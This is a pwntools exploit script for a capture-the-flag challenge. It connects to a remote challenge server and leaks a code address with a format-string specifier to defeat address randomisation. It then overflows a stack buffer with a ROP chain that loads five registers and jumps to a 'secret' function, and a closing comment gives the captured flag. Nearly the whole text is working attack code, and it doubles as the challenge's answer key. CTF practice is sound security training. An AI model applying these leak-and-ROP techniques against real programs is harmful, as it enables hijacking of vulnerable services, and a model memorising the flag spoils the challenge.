from pwn import *
elf = context.binary = ELF("./password")
#p = process()
p = remote("ctf-chall.stembascc.com",6055)
p.sendline("password")
p.sendline("incorrect")
p.sendline("again")
p.sendline("again later")
p.sendline("%19$p")
p.recvuntil(b"like this? ")
main_leak = int(p.recvline().strip().decode(),16)
main_offset = elf.sym['main'] + 34
elf.address = main_leak - main_offset
offset = b"A" * 72
secret = p64(elf.sym['secret'])
print(hex(main_leak))
# rop = ROP(elf)
# rop.rdi = p64()
# rop.rsi = p64()
# rop.rdx = p64()
# rop.rcx = p64()
# rop.r8 = p64()
rop = ROP(elf)
rdi = p64(rop.find_gadget(['pop rdi','ret'])[0])
rsi = p64(rop.find_gadget(['pop rsi','ret'])[0])
rdx = p64(rop.find_gadget(['pop rdx','ret'])[0])
rcx = p64(rop.find_gadget(['pop rcx','ret'])[0])
r8 = p64(rop.find_gadget(['pop r8','ret'])[0])
rdi_value = p64(0xdeadbeefdeadbeef)
rsi_value = p64(0xc0debabec0debabe)
rdx_value = p64(0x4141414141414141)
rcx_value = p64(0x4242424242424242)
r8_value = p64(0x4343434343434343)
ret = p64(rop.find_gadget(['ret'])[0])
payload = offset + rdi + rdi_value + rsi + rsi_value + rdx + rdx_value + rcx + rcx_value + r8 + r8_value + ret + secret + p64(0x0)
p.sendline(payload)
print(p.recvall().strip().decode())

# Flag: SIJAWARA{n3ver_f0rg3t_your_p4ssw0rd}
